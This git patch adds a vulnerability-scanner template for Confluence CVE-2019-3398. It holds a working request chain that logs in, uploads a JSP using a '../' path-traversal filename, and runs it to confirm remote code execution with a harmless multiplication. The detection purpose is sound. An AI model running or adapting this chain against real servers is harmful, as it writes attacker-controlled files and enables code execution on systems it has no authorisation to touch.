From 59ac982c424e9970e7b1ebe5c04d75b7a4ecd293 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 May 2023 17:54:05 +0530 Subject: [PATCH] Create CVE-2019-3398.yaml --- http/cves/2019/CVE-2019-3398.yaml | 71 +++++++++++++++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 http/cves/2019/CVE-2019-3398.yaml diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml new file mode 100644 index 0000000000..afecf771f3 --- /dev/null +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -0,0 +1,71 @@ +id: CVE-2019-3398 + +info: + name: Atlassian Confluence Download Attachments - Remote Code Execution + author: rootxharsh,iamnoooob,pdresearch + severity: high + description: | + Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. + reference: + - https://blogs.juniper.net/en-us/threat-research/cve-2019-3398-atlassian-confluence-download-attachments-remote-code-execution + - https://nvd.nist.gov/vuln/detail/CVE-2019-3398 + tags: cve,cve2019,atlassian,confluence,rce,authenticated,intrusive + +variables: + num1: "{{rand_int(800000, 999999)}}" + num2: "{{rand_int(800000, 999999)}}" + result: "{{to_number(num1)*to_number(num2)}}" + +http: + - raw: + - | + POST /dologin.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + os_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination= + + - | + GET /pages/createpage.action HTTP/1.1 + Host: {{Hostname}} + + - | + POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1 + Host: {{Hostname}} + + ${{{num1}}*{{num2}}} + + - | + GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1 + Host: {{Hostname}} + + - | + GET /pages/{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body_5 + words: + - "{{result}}" + + extractors: + - type: regex + part: body + name: csrftoken + internal: true + group: 1 + regex: + - 'name="atlassian\-token" content="([a-z0-9]+)"> ' + + - type: regex + part: body + name: draftID + internal: true + group: 1 + regex: + - 'ta name="ajs\-draft\-id" content="([0-9]+)">'